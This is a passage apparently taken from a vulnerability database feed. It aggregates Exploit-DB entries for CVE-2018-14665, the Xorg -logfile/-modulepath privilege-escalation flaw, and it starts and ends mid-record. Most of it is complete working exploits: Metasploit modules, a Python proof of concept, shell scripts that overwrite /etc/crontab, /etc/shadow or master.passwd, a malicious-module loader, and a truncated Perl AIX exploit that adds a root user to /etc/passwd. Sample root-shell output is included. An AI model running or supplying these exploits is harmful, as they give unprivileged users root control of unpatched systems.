issue\"\r\n end\r\n\r\n # suid program check\r\n xorg_path = cmd_exec \"command -v Xorg\"\r\n unless xorg_path.include?(\"Xorg\")\r\n vprint_error \"Could not find Xorg executable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg path found at #{xorg_path}\"\r\n unless setuid? xorg_path\r\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\r\n\r\n # version check\r\n x_version = cmd_exec \"Xorg -version\"\r\n if x_version.include?(\"Release Date\")\r\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\r\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\r\n vprint_error \"Xorg version #{v} not supported\"\r\n return CheckCode::Safe\r\n end\r\n elsif x_version.include?(\"Fatal server error\")\r\n vprint_error \"User probably does not have console auth\"\r\n vprint_error \"Below is Xorg -version output\"\r\n vprint_error x_version\r\n return CheckCode::Safe\r\n else\r\n vprint_warning \"Could not parse Xorg -version output\"\r\n return CheckCode::Appears\r\n end\r\n vprint_good \"Xorg version #{v} is vulnerable\"\r\n\r\n # process check for /X\r\n proc_list = cmd_exec \"ps ax\"\r\n if proc_list.include?('/X ')\r\n vprint_warning('Xorg in process list')\r\n return CheckCode::Appears\r\n end\r\n vprint_good('Xorg does not appear running')\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n session.sys.process.execute '/bin/sh', \"-c \\\"#{@clean_up}\\\"\"\r\n else\r\n session.shell_command(@clean_up)\r\n end\r\n print_good \"Returning session after cleaning\"\r\n ensure\r\n super\r\n end\r\n\r\n def exploit\r\n\r\n check_status = check\r\n if check_status == CheckCode::Appears\r\n print_warning 'Could not get version or Xorg process possibly running, may fail'\r\n elsif check_status == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'This session already has root privileges'\r\n end\r\n\r\n unless writable? datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n print_good 'Passed all initial checks for exploit'\r\n\r\n pscript = \"#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}\"\r\n @clean_up = \"/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old\"\r\n xdisplay = datastore['Xdisplay']\r\n\r\n # Uploading file crontab will run\r\n print_status 'Uploading your payload, this could take a while'\r\n if payload.arch.first == 'cmd'\r\n write_file(pscript, payload.encoded)\r\n else\r\n write_file(pscript, generate_payload_exe)\r\n end\r\n register_file_for_cleanup pscript\r\n chmod pscript\r\n\r\n # Exploit steps on crontab so backing it up\r\n cmd_exec \"cat /etc/crontab > #{pscript}.b\"\r\n # Actual exploit with cron overwrite\r\n print_status 'Trying /etc/crontab overwrite'\r\n cmd_exec \"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null\"\r\n Rex.sleep 5\r\n cmd_exec \"pkill Xorg\"\r\n Rex.sleep 1\r\n cron_check = cmd_exec \"grep -F #{pscript} /etc/crontab\"\r\n unless cron_check.include? pscript\r\n rm_f \"#{pscript}.b\"\r\n print_error 'Deleting crontab backup'\r\n fail_with Failure::NotVulnerable, '/etc/crontab not modified'\r\n end\r\n print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45908"}, {"lastseen": "2018-11-30T12:31:24", "description": "", "published": "2018-11-13T00:00:00", "type": "exploitdb", "title": "xorg-x11-server < 1.20.1 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-13T00:00:00", "id": "EDB-ID:45832", "href": "https://www.exploit-db.com/exploits/45832", "sourceData": "# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)\r\n# Date: 2018-11-07\r\n# Exploit Author: @bolonobolo\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: 1.19.5\r\n# Tested on: RHEL 7.3 && 7.5\r\n# CVE : CVE-2018-14665\r\n# Explanation\r\n# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user \r\n# has to be logged in trought console at the moment the PE script launched.\r\n# In fact during the logged in session of the legitimate non-root user, \r\n# a file with the name of the non-root user will be created in the /var/run/console folder. \r\n# With that file present, the same non-root user can launch a Xorg command via SSH. \r\n# \r\n# Usage: $ python poc.py\r\n# $ python poc.py \r\n# [*] Waiting for bolo to connect to the console\r\n# [*] OK --> bolo console opened\r\n# [*] Building root shell wait 2 minutes\r\n# [*] crontab overwritten\r\n# \r\n# ... cut Xorg output ...\r\n# \r\n# [*] Xorg killed\r\n# (II) Server terminated successfully (0). Closing log file.\r\n# [*] Don't forget to cleanup /etc/crontab and /tmp dir\r\n# sh-4.2# id && whoami\r\n# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)\r\n# root\r\n# sh-4.2#\r\n\r\n\r\n#!/usr/bin/python\r\nimport os\r\nimport getpass\r\nimport subprocess\r\n\r\nuserList = []\r\npath=\"/var/run/console/\"\r\n\r\ndef getWhoami():\r\n\treturn getpass.getuser()\r\n\r\ndef getConsole(path):\r\n\tp = subprocess.Popen([\"ls\", path], stdout=subprocess.PIPE)\r\n\t(console, err) = p.communicate()\r\n\tconsoleList = str.splitlines(console)\r\n\treturn consoleList\r\n\r\ndef payload():\r\n\tf = open(\"/tmp/payload\", \"w\")\r\n\tpayload = (\"cp /bin/sh /usr/local/bin/shell\\n\" \r\n\t\t\t\"echo \\\"#include <stdio.h> \\\" > /tmp/shell.c\\n\"\r\n \t\t\t\"echo \\\"#include <stdlib.h>\\\" >> /tmp/shell.c\\n\"\r\n \t\t\t\"echo \\\"#include <sys/types.h>\\\" >> /tmp/shell.c\\n\"\r\n \t\t\t\"echo \\\"#include <unistd.h>\\\" >> /tmp/shell.c\\n\"\r\n\t\t\t\"echo 'int main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}' >> /tmp/shell.c\\n\"\r\n\t\t\t\"gcc /tmp/shell.c -o /usr/local/bin/shell\\n\"\r\n\t\t\t\"chmod 4777 /usr/local/bin/shell\\n\")\r\n\tf.write(payload)\t\r\n\t\r\ndef executePayload():\t\r\n\tos.system(\"chmod +x /tmp/payload\")\r\n\tos.system(\"cd /etc; Xorg -fp \\\"* * * * * root /tmp/payload\\\" -logfile crontab :1 &\")\r\n\tprint \"[*] crontab overwritten\"\r\n\tos.system(\"sleep 5\")\r\n\tos.system(\"pkill Xorg\")\r\n\tprint \"[*] Xorg killed\"\r\n\tos.system(\"sleep 120\")\r\n\treturn\r\n\r\ndef main():\r\n\twhoami = getWhoami()\r\n\tprint \"[*] Waiting for \" + whoami + \" to connect to the console\"\r\n\ti = 0\r\n\twhile (i == 0):\r\n\t\tconsoleList = getConsole(path)\r\n\t\tfor user in consoleList:\r\n\t\t\tif user == whoami :\r\n\t\t\t\tprint \"[*] OK --> \" + user + \" console opened\"\r\n\t\t\t\ti = 1\r\n\tprint \"[*] Building root shell wait 2 minutes\"\r\n\tpayload()\r\n\texecutePayload()\r\n\tprint \"[*] Don't forget to cleanup /etc/crontab and /tmp dir\"\r\n\tos.system(\"/usr/local/bin/shell\")\t\t\t\r\n\r\nif __name__ == '__main__':\r\n\tmain()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45832"}, {"lastseen": "2019-11-20T14:24:43", "description": "", "published": "2019-11-20T00:00:00", "type": "exploitdb", "title": "Xorg X11 Server - Local Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-11-20T00:00:00", "id": "EDB-ID:47701", "href": "https://www.exploit-db.com/exploits/47701", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server Local Privilege Escalation',\r\n 'Description' => %q(\r\n WARNING: Successful execution of this module results in /etc/passwd being overwritten.\r\n\r\n This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.\r\n Due to permission restrictions of the crontab in AIX, this module does not use cron,\r\n and instead overwrites /etc/passwd in order to create a new user with root privileges.\r\n All currently logged in users need to be included when /etc/passwd is overwritten,\r\n else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\r\n The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\r\n and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when\r\n overwriting /etc/passwd.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and original FreeBSD exploit\r\n 'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'Notes' =>\r\n {\r\n 'SideEffects' => [ CONFIG_CHANGES ]\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2018-14665'],\r\n ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],\r\n ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],\r\n ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],\r\n ['EDB', '45938']\r\n ],\r\n 'Platform' => ['unix'],\r\n 'Arch' => [ARCH_CMD],\r\n 'SessionTypes' => ['shell'],\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'perl'\r\n }\r\n },\r\n 'DefaultOptions' => {\r\n 'Payload' => 'cmd/unix/reverse_perl'\r\n },\r\n 'Targets' =>\r\n [\r\n ['IBM AIX Version 6.1', {}],\r\n ['IBM AIX Version 7.1', {}],\r\n ['IBM AIX Version 7.2', {}]\r\n ],\r\n 'DefaultTarget' => 1))\r\n\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n xorg_path = cmd_exec('command -v Xorg')\r\n if !xorg_path.include?('Xorg')\r\n print_error('Could not find Xorg executable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n ksh93_path = cmd_exec('command -v ksh93')\r\n if !ksh93_path.include?('ksh')\r\n print_error('Could not find Ksh93 executable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if !xorg_vulnerable?\r\n print_error('Xorg version is not vulnerable')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n status = check\r\n\r\n if status == Exploit::CheckCode::Safe\r\n fail_with(Failure::NotVulnerable, '')\r\n end\r\n\r\n if !writable?(datastore['WritableDir'])\r\n fail_with(Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\")\r\n end\r\n\r\n xorg_path = cmd_exec('command -v Xorg')\r\n ksh93_path = cmd_exec('command -v ksh93')\r\n\r\n xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])\r\n xorg_script_path = \"#{datastore['WritableDir']}/wow.ksh\"\r\n upload_and_chmodx(xorg_script_path, xorg_payload)\r\n\r\n passwd_backup = \"#{datastore['WritableDir']}/passwd.backup\"\r\n print_status(\"Backing up /etc/passwd to #{passwd_backup}\")\r\n cmd_exec(\"cp /etc/passwd #{passwd_backup}\")\r\n register_file_for_cleanup(passwd_backup)\r\n\r\n print_status(\"Executing #{xorg_script_path}\")\r\n cmd_exec(xorg_script_path)\r\n print_status('Checking if we are root')\r\n\r\n if root?\r\n shell_payload = %(#!#{ksh93_path}\r\n#{payload.encoded}\r\n)\r\n shell_script_path = \"#{datastore['WritableDir']}/wowee.ksh\"\r\n upload_and_chmodx(shell_script_path, shell_payload)\r\n\r\n print_status('Executing shell payload')\r\n cmd_exec(\"#{ksh93_path} -c \\\"echo #{shell_script_path} | su - wow &\\\"\")\r\n\r\n print_status('Restoring original /etc/passwd')\r\n cmd_exec(\"su - wow -c \\\"cp #{passwd_backup} /etc/passwd\\\"\")\r\n else\r\n fail_with(Failure::PayloadFailed, '')\r\n end\r\n end\r\n\r\n def generate_xorg_payload(xorg_path, ksh93_path, writabledir)\r\n passwd_file = read_file('/etc/passwd')\r\n passwd_array = passwd_file.split(\"\\n\")\r\n\r\n print_status('Retrieving currently logged in users')\r\n users = cmd_exec('who | cut -d\\' \\' -f1 | sort | uniq')\r\n users << \"\\n\"\r\n users_array = users.split(\"\\n\")\r\n\r\n logged_in_users = ''\r\n if !users_array.empty?\r\n users_array.each do |user|\r\n user << ':'\r\n passwd_array.each do |line|\r\n if line.index(user) == 0\r\n logged_in_users << '\\n'\r\n logged_in_users << line\r\n end\r\n end\r\n end\r\n end\r\n\r\n passwd_data = \"$'#{logged_in_users}\\\\nwow::0:0::/:/usr/bin/ksh\\\\n#'\"\r\n\r\n subdir_count = writabledir.count('/')\r\n relative_passwd = '../' * subdir_count + '../../etc/passwd'\r\n\r\n return %(#!#{ksh93_path}\r\n #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1\r\n)\r\n end\r\n\r\n def xorg_vulnerable?\r\n version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \\'{ print $2 }\\'')\r\n print_status(\"Xorg version is #{version}\")\r\n semantic_version = Gem::Version.new(version)\r\n\r\n vulnerable_versions = [\r\n ['6.1.9.0', '6.1.9.100'],\r\n ['7.1.4.0', '7.1.4.30'],\r\n ['7.1.5.0', '7.1.5.31'],\r\n ['7.2.0.0', '7.2.0.1'],\r\n ['7.2.1.0', '7.2.1.0'],\r\n ['7.2.2.0', '7.2.2.0'],\r\n ['7.2.3.0', '7.2.3.15']\r\n ]\r\n\r\n vulnerable_versions.each do |version_pair|\r\n if semantic_version >= Gem::Version.new(version_pair[0]) &&\r\n semantic_version <= Gem::Version.new(version_pair[1])\r\n return true\r\n end\r\n end\r\n\r\n return false\r\n end\r\n\r\n def root?\r\n id_output = cmd_exec('su - wow -c \"id\"')\r\n\r\n if id_output.include?('euid=0') || id_output.include?('uid=0')\r\n print_good('Got root!')\r\n return true\r\n end\r\n\r\n print_error('Not root')\r\n false\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n print_status(\"Writing to #{path}\")\r\n rm_f(path)\r\n write_file(path, data)\r\n cmd_exec(\"chmod 0555 '#{path}'\")\r\n\r\n register_file_for_cleanup(path)\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47701"}, {"lastseen": "2018-11-30T21:59:55", "description": "", "published": "2018-11-30T00:00:00", "type": "exploitdb", "title": "xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-30T00:00:00", "id": "EDB-ID:45922", "href": "https://www.exploit-db.com/exploits/45922", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# raptor_xorgy - xorg-x11-server LPE via modulepath switch\r\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# This exploit variant triggers the bug in the -modulepath command line switch\r\n# to load a malicious X11 module in order to escalate privileges to root on\r\n# vulnerable systems. This technique is less invasive than exploiting the \r\n# -logfile switch, however the gcc compiler must be present in order for it to\r\n# work out of the box. Alternatively, you must use a pre-compiled malicious .so\r\n# compatible with the target system and modify the exploit accordingly.\r\n#\r\n# It works very reliably on Solaris 11.4 and should work on most vulnerable\r\n# Linux distributions (though I haven't tested it). For some reason, it fails to\r\n# obtain uid 0 on OpenBSD... They might have an additional protection in place.\r\n#\r\n# Thanks to @alanc and @nushinde for discussing this alternative vector.\r\n#\r\n# See also:\r\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\r\n# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm\r\n# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html\r\n# https://nvd.nist.gov/vuln/detail/CVE-2006-0745\r\n#\r\n# Usage:\r\n# raptor@stalker:~$ chmod +x raptor_xorgy\r\n# raptor@stalker:~$ ./raptor_xorgy\r\n# [...]\r\n# root@stalker:~# id\r\n# uid=0(root) gid=0(root)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\r\n# Oracle Solaris 11 SPARC [untested]\r\n# CentOS Linux 7 [untested, it should work]\r\n# Red Hat Enterprise Linux 7 [untested]\r\n# Ubuntu Linux 18.10 [untested]\r\n# Ubuntu Linux 18.04 LTS [untested]\r\n# Ubuntu Linux 16.04 LTS [untested]\r\n# Debian GNU/Linux 9 [untested]\r\n# [...]\r\n#\r\n\r\necho \"raptor_xorgy - xorg-x11-server LPE via modulepath switch\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the payload\r\ncat << EOF > /tmp/pwned.c\r\n_init()\r\n{\r\n\tsetuid(0);\r\n\tsetgid(0);\r\n\tsystem(\"/bin/bash\");\r\n}\r\nEOF\r\n# libglx.so should be a good target, refer to Xorg logs for other candidates\r\ngcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so\r\nif [ $? -ne 0 ]; then echo; echo \"error: cannot compile /tmp/pwned.c\"; exit; fi\r\n\r\n# trigger the bug\r\necho \"Got root?\"\r\nXorg -modulepath \",/tmp\" :1", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45922"}, {"lastseen": "2018-11-30T12:31:31", "description": "", "published": "2018-10-30T00:00:00", "type": "exploitdb", "title": "xorg-x11-server 1.20.3 - Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-30T00:00:00", "id": "EDB-ID:45742", "href": "https://www.exploit-db.com/exploits/45742", "sourceData": "# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation\r\n# Date: 2018-10-27\r\n# Exploit Author: Marco Ivaldi\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: xorg-x11-server 1.19.0 - 1.20.2\r\n# Tested on: OpenBSD 6.3 and 6.4\r\n# CVE : CVE-2018-14665\r\n\r\n# raptor_xorgasm\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\r\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# This exploit targets OpenBSD's cron in order to escalate privileges to\r\n# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical\r\n# console, it works perfectly on pseudo-terminals connected via SSH as well.\r\n#\r\n# See also:\r\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\r\n# https://www.exploit-db.com/exploits/45697/\r\n# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850\r\n#\r\n# Usage:\r\n# blobfish$ chmod +x raptor_xorgasm\r\n# blobfish$ ./raptor_xorgasm\r\n# [...]\r\n# Be patient for a couple of minutes...\r\n# [...]\r\n# Don't forget to cleanup and run crontab -e to reload the crontab.\r\n# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab\r\n# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned\r\n# blobfish# id\r\n# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# OpenBSD 6.4 (Xorg 1.19.6) [tested]\r\n# OpenBSD 6.3 (Xorg 1.19.6) [tested]\r\n#\r\n\r\necho \"raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\n\r\n# prepare the payload\r\ncat << EOF > /tmp/xorgasm\r\ncp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available\r\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c\r\ngcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid\r\nchmod 4777 /usr/local/bin/pwned\r\nEOF\r\nchmod +x /tmp/xorgasm\r\n\r\n# trigger the bug\r\ncd /etc\r\nXorg -fp \"* * * * * root /tmp/xorgasm\" -logfile crontab :1 &\r\nsleep 5\r\npkill Xorg\r\n\r\n# run the setuid shell\r\necho\r\necho \"Be patient for a couple of minutes...\"\r\necho\r\nsleep 120\r\necho\r\necho \"Don't forget to cleanup and run crontab -e to reload the crontab.\"\r\nls -l /etc/crontab*\r\nls -l /usr/local/bin/pwned\r\n/usr/local/bin/pwned", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45742"}, {"lastseen": "2018-11-30T12:31:34", "description": "", "published": "2018-10-25T00:00:00", "type": "exploitdb", "title": "xorg-x11-server < 1.20.3 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-25T00:00:00", "id": "EDB-ID:45697", "href": "https://www.exploit-db.com/exploits/45697", "sourceData": "#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet\r\n\r\ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su\r\n\r\nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.\r\n\r\n\r\n\r\n\r\n\r\n#!/bin/sh\r\n# local privilege escalation in X11 currently\r\n# unpatched in OpenBSD 6.4 stable - exploit\r\n# uses cve-2018-14665 to overwrite files as root. \r\n# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid\r\n# and vulnerable in default OpenBSD.\r\n#\r\n# - https://hacker.house\r\necho [+] OpenBSD 6.4-stable local root exploit\r\ncd /etc\r\nXorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &\r\nsleep 5\r\npkill Xorg\r\necho [-] dont forget to mv and chmod /etc/master.passwd.old back \r\necho [+] type 'Password1' and hit enter for root\r\nsu -\r\n\r\n\r\nEBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45697"}, {"lastseen": "2018-12-04T16:13:21", "description": "", "published": "2018-12-04T00:00:00", "type": "exploitdb", "title": "Xorg X11 Server (AIX) - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-12-04T00:00:00", "id": "EDB-ID:45938", "href": "https://www.exploit-db.com/exploits/45938", "sourceData": "# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation\r\n# Date: 29/11/2018\r\n# Exploit Author: @0xdono\r\n# Original Discovery and Exploit: Narendra Shinde\r\n# Vendor Homepage: https://www.x.org/\r\n# Platform: AIX\r\n# Version: X Window System Version 7.1.1\r\n# Fileset: X11.base.rte < 7.1.5.32\r\n# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)\r\n# CVE: CVE-2018-14665\r\n#\r\n# Explanation:\r\n# Incorrect command-line parameter validation in the Xorg X server can\r\n# lead to privilege elevation and/or arbitrary files overwrite, when the\r\n# X server is running with elevated privileges.\r\n# The -logfile argument can be used to overwrite arbitrary files in the\r\n# file system, due to incorrect checks in the parsing of the option.\r\n#\r\n# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.\r\n# It overwrites /etc/passwd in order to create a new user with root privile=\r\nges.=20\r\n# All currently logged in users need to be included when /etc/passwd is ove=\r\nrwritten,\r\n# else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to ch=\r\nange user.\r\n# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX=\r\n,\r\n# and is replaced by '-config'.\r\n# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.\r\n#\r\n# IBM has not yet released a patch as of 29/11/2018.\r\n#\r\n# See also:\r\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\r\n# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html\r\n# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl\r\n#\r\n# Usage:\r\n# $ oslevel -s\r\n# 7100-04-00-0000\r\n# $ Xorg -version\r\n# =20\r\n# X Window System Version 7.1.1\r\n# Release Date: 12 May 2006\r\n# X Protocol Version 11, Revision 0, Release 7.1.1\r\n# Build Operating System: AIX IBM\r\n# Current Operating System: AIX sovma470 1 7 00C3C6F54C00\r\n# Build Date: 07 July 2006\r\n# Before reporting problems, check http://wiki.x.org\r\n# to make sure that you have the latest version.\r\n# Module Loader present\r\n# $ id\r\n# uid=3D16500(nmyo) gid=3D1(staff)\r\n# $ perl aixxorg.pl\r\n# [+] AIX X11 server local root exploit\r\n# [-] Checking for Xorg and ksh93=20\r\n# [-] Opening /etc/passwd=20\r\n# [-] Retrieving currently logged in users=20\r\n# [-] Generating Xorg command=20\r\n# [-] Opening /tmp/wow.ksh=20\r\n# [-] Writing Xorg command to /tmp/wow.ksh=20\r\n# [-] Backing up /etc/passwd to /tmp/passwd.backup=20\r\n# [-] Making /tmp/wow.ksh executable=20\r\n# [-] Executing /tmp/wow.ksh=20\r\n# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20\r\n# [-] Done=20\r\n# [+] 'su wow' for root shell=20\r\n# $ su wow\r\n# # id\r\n# uid=3D0(root) gid=3D0(system)\r\n# # whoami\r\n# root\r\n\r\n#!/usr/bin/perl\r\nprint \"[+] AIX X11 server local root exploit\\n\";\r\n\r\n# Check Xorg is in path\r\nprint \"[-] Checking for Xorg and ksh93 \\n\";\r\nchomp($xorg =3D `command -v Xorg`);\r\nif ($xorg eq \"\"){=20\r\n print \"[X] Can't find Xorg binary, try hardcode it? exiting... \\n\";\r\n exit;\r\n}\r\n\r\n# Check ksh93 is in path\r\nchomp($ksh =3D `command -v ksh93`);\r\nif ($ksh eq \"\"){\r\n print \"[X] Can't find ksh93 binary, try hardcode it? exiting... \\n\";\r\n exit;\r\n}\r\n\r\n# Read in /etc/passwd\r\nprint \"[-] Opening /etc/passwd \\n\";\r\nopen($passwd_fh, '<', \"/etc/passwd\");\r\nchomp(@passwd_array =3D <$passwd_fh>);\r\nclose($passwd_fh);\r\n\r\n# Retrieve currently logged in users\r\nprint \"[-] Retrieving currently logged in users \\n\";\r\n@users =3D `who | cut -d' ' -f1 | sort | uniq`;\r\nchomp(@users);\r\n\r\n# For all logged in users, add their current passwd entry to string\r\n# that will be used to overwrite passwd\r\n$users_logged_in_passwd =3D '';\r\nforeach my $user (@users)\r\n{\r\n $user .=3D \":\";\r\n foreach my $line (@passwd_array)\r\n {\r\n if (index($line, $user) =3D=3D 0) {\r\n $users_logged_in_passwd =3D $users_logged_in_passwd . '\\n' . $l=\r\nine;\r\n }\r\n }\r\n}\r\n\r\n# Use '-config' as '-fp' (which is used in the original BSD exploit) is not=\r\n written to log\r\nprint \"[-] Generating Xorg command \\n\";\r\n$blob =3D '-config ' . '$\\'' . $users_logged_in_passwd . '\\nwow::0:0::/:/us=\r\nr/bin/ksh\\n#' . '\\'';\r\n\r\nprint \"[-] Opening /tmp/wow.ksh \\n\";=09=09\r\nopen($fr, '>', \"/tmp/wow.ksh\");\r\n\r\n# Use ksh93 for ANSI-C quoting\r\nprint \"[-] Writing Xorg command to /tmp/wow.ksh \\n\";\r\nprint $fr '#!' . \"$ksh\\n\";\r\nprint $fr \"$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \\n\";\r\nclose $fr;\r\n\r\n# Backup passwd=20\r\nprint \"[-] Backing up /etc/passwd to /tmp/passwd.backup \\n\";\r\nsystem(\"cp /etc/passwd /tmp/passwd.backup\");\r\n\r\n# Make script executable and run it\r\nprint \"[-] Making /tmp/wow.ksh executable \\n\";\r\nsystem(\"chmod +x /tmp/wow.ksh\");\r\nprint \"[-] Executing /tmp/wow.ksh \\n\";\r\nsystem(\"/tmp/wow.ksh\");\r\n\r\n# Replace overwritten passwd with: original passwd + wow user\r\nprint \"[-] Cleaning up 